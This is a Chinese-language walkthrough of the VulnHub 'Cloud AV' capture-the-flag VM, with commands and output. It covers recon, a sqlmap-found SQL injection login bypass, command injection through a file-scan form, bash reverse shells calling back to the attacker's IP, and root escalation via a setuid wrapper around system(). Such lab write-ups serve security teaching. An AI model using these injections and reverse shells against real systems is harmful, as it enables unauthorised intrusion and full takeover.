下載靶機(Target):https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
靶機推薦使用 VirtualBox 匯入,注意以下兩個設定
VMSVGAUSB 1.1 (OHCI) 控制器設定網路環境:https://www.cnblogs.com/shadow-/p/16815020.html
完成上面內容後,需要對 kali 與 target 做 快照記錄 當前環境和佈置,以免實驗過程中出現錯誤造成不可挽回的損失
此過程一般使用 Kali 中掃描工具 arp-scan, nmap, Fping, Nping, Arping, Nbtscan, ...
一般推薦 arp-scan 使用簡單
使用 sudo arp-scan -l -I eth1 尋找目標,發現目標 192.168.56.109
┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -l -I eth1 127 ⨯
Interface: eth1, type: EN10MB, MAC: 08:00:27:ad:7a:24, IPv4: 192.168.56.111
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:4d:8e:be PCS Systemtechnik GmbH
192.168.56.109 08:00:27:17:f5:a8 PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.201 seconds (116.31 hosts/sec). 3 responded
-I 是 --interface= 簡寫作用是指定掃描的介面,如果沒有預設掃描 eth0-l 引數,當然也可以直接填寫需要掃描的網段使用 nmap 對目標進行埠掃描,一個經典的 nmap 掃描命令 nmap -A -T4 192.168.56.109 即可
┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 192.168.56.109 1 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-23 14:29 CST
Nmap scan report for 192.168.56.109
Host is up (0.0011s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6a424b7c2a060f504b32cfb831e9c4f4 (RSA)
| 256 81c7600fd71e56f7a31e9f7627bd3127 (ECDSA)
|_ 256 7190c326ba3be8b3537e7353274d6baf (ED25519)
8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.83 seconds
引數 -A 用來進行作業系統及其版本的探測
引數 -T4 可以加快執行速度
從掃描結果我們可以得到以下資訊
對於 ssh 目前沒有頭緒,我們可以嘗試存取其開發的 http 服務
使用瀏覽器存取 http://192.168.56.109:8080/,是一個普通網頁,我們可以在網頁中檢視原始碼
<html>
<body>
<h1>Cloud Anti-Virus Scanner!</h1>
<h2>This is a beta Cloud Anti-Virus Scanner service.</h2>
<h3>Please enter your invite code to start testing</h3>
<form action="/login" method="POST">
<input type="text" name="password" placeholder="Invite Code">
<input type="submit" value="Log in">
</form>
</body>
</html>
/login 網頁,我們可以大致推理出,這個表單提交的資料是用於登入在網站這發現網頁內容中查詢可能的注入點,我們可以使用 sqlmap 進行測試
http://192.168.56.109:8080/ 使用 Ctrl + Shift + I 開啟 Web 開發者工具http://192.168.56.109:8080/login 設定攔截http://192.168.56.109:8080/ 傳送上面表單的 POST 請求sqlmap -r target.txt -f --level 4 --risk 3┌──(kali㉿kali)-[~/workspace]
└─$ sqlmap -r testsql.txt -f --level 4 --risk 3
___
__H__
___ ___[']_____ ___ ___ {1.6.10#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:18:43 /2022-10-23/
[15:18:43] [INFO] parsing HTTP request from 'testsql.txt'
[15:18:43] [INFO] testing connection to the target URL
[15:18:44] [INFO] testing if the target URL content is stable
[15:18:44] [INFO] target URL content is stable
[15:18:44] [INFO] testing if POST parameter 'password' is dynamic
[15:18:44] [WARNING] POST parameter 'password' does not appear to be dynamic
[15:18:44] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[15:18:45] [INFO] testing for SQL injection on POST parameter 'password'
[15:18:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:18:46] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
got a refresh intent (redirect like response common to login pages) to '/scan'. Do you want to apply it from now on? [Y/n] Y
[15:18:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
[15:18:55] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'SQLite'
it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'SQLite' extending provided level (4) value? [Y/n] Y
[15:19:14] [INFO] testing 'Generic inline queries'
[15:19:14] [INFO] testing 'SQLite inline queries'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[15:19:14] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[15:19:14] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
[15:20:15] [INFO] POST parameter 'password' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable
[15:20:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:20:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:18:54] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable 可以看出注入型別 OR boolean-based構造 SQL 注入語句,已知注入型別 OR boolean-based 可以嘗試比較通用的語句 " or 1=1-- 做為頁面 http://192.168.56.109:8080/ 中表單的 password 值進行提交表單
到目前為止,我們成功登入 http://192.168.56.109:8080/scan 頁面,通過簡單的探索發現此頁面是這個 Web 應用的後臺管理頁面,
其中存在資料提交,但通過關鍵詞 Try scanning some of these files with our scanner! 知道傳入的資料是被某種程式進行查殺,更多的是涉及 shell 中執行
<html>
<body>
<h1>Cloud Anti-Virus Scanner!</h1>
<h3>Try scanning some of these files with our scanner!</h3>
<pre>total 4756
-rwxr-xr-x 1 scanner scanner 1113504 Oct 21 2018 bash
-rwxr-xr-x 1 scanner scanner 34888 Oct 21 2018 bzip2
-rwxr-xr-x 1 scanner scanner 35064 Oct 21 2018 cat
-rw-rw-r-- 1 scanner scanner 68 Oct 21 2018 eicar
-rw-rw-r-- 1 scanner scanner 5 Oct 21 2018 hello
-rwxr-xr-x 1 scanner scanner 35312 Oct 21 2018 netcat
-rwxr-xr-x 1 scanner scanner 3633560 Oct 21 2018 python
</pre>
<form action="/output" method="POST">
<input type="filename" name="filename" placeholder="File Name">
<input type="submit" value="Scan!">
</form>
</body>
</html>
我們可以嘗試使用 | 管道進行命令串聯,改變回返的資料內容,並夾雜我們想要的資訊
輸入嘗試 a | id 得到了下面結果,這說明其中的資料沒有過濾,我們可以通過這個執行命令
uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
通過這個漏洞,我們可以構建一個 a | ls | grep 'xxxxx' | 想要執行的命令
我們可以檢視是否存在 wget 有助於木馬上傳,配合 metasploit 攻擊
也可以使用 nc 反彈 shell 依次執行下面命令,但上面的 nc 版本不利於反彈,也可以使用 nc 實現但比較麻煩
nc 上傳 bash 反彈木馬程式
a | ls | grep 'xxxxx' | touch a.sha | ls | grep 'xxxxx' | nc -l -p 4444 -w6 > a.shnc 192.168.56.109 4444 < 'bash -i >& /dev/tcp/192.168.56.111/23333 0>&1'netcat -lvp 23333 監聽埠a | ls | grep 'xxxxx' | bash a.sh 反彈 shell┌──(kali㉿kali)-[~/workspace]
└─$ netcat -lvp 23333
listening on [any] 23333 ...
192.168.56.109: inverse host lookup failed: Unknown host
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 52396
bash: cannot set terminal process group (694): Inappropriate ioctl for device
bash: no job control in this shell
scanner@cloudav:~/cloudav_app$ ls
ls
app.py
a.sh
database.sql
get-pip.py
get-pip.py.1
get-pip.py.2
get-pip.py.3
samples
templates
scanner@cloudav:~/cloudav_app$
本質上此使用者 scanner 的可行動服務就非常高,隨便的方法都能攻破【不在進行其他 shell 反彈演示,有需求自行查詢】
我們已經進入目標的內部,我們探索一下目錄、檔案
我們在使用者根目錄發現一個有特殊許可權的檔案 -rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudav
scanner@cloudav:~$ ls -alh
ls -alh
total 60K
drwxr-xr-x 6 scanner scanner 4.0K Oct 24 2018 .
drwxr-xr-x 4 root root 4.0K Oct 21 2018 ..
-rw------- 1 scanner scanner 5 Oct 24 2018 .bash_history
-rw-r--r-- 1 scanner scanner 220 Oct 21 2018 .bash_logout
-rw-r--r-- 1 scanner scanner 3.7K Oct 21 2018 .bashrc
drwx------ 2 scanner scanner 4.0K Oct 21 2018 .cache
drwxrwxr-x 4 scanner scanner 4.0K Oct 23 10:59 cloudav_app
drwx------ 3 scanner scanner 4.0K Oct 21 2018 .gnupg
drwxrwxr-x 3 scanner scanner 4.0K Oct 21 2018 .local
-rw-r--r-- 1 scanner scanner 807 Oct 21 2018 .profile
-rw-rw-r-- 1 scanner scanner 66 Oct 21 2018 .selected_editor
-rwsr-xr-x 1 root scanner 8.4K Oct 24 2018 update_cloudav
-rw-rw-r-- 1 scanner scanner 393 Oct 24 2018 update_cloudav.c
-s 指的是強制位許可權,具有程式執行時子程序許可權繼承,s 許可權位是一個敏感的許可權位,容易造成系統的安全問題#include <stdio.h>
int main(int argc, char *argv[])
{
char *freshclam="/usr/bin/freshclam";
if (argc < 2){
printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n");
return 1;
}
char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);
sprintf(command, "%s %s", freshclam, argv[1]);
setgid(0);
setuid(0);
system(command);
return 0;
}
獲取 root 許可權
netcat -lvp 4444 監聽 4444 埠touch b.sh && echo 'bash -i >& /dev/tcp/192.168.56.111/4444 0>&1' > b.sh && ./update_cloudav "a | ls | grep 'xxxxx' | bash b.sh"┌──(kali㉿kali)-[~]
└─$ netcat -lvp 4444
listening on [any] 4444 ...
192.168.56.109: inverse host lookup failed: Unknown host
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 56672
bash: cannot set terminal process group (694): Inappropriate ioctl for device
bash: no job control in this shell
root@cloudav:~# id
id
uid=0(root) gid=0(root) groups=0(root),1001(scanner)
遊戲結束 GAMEOVER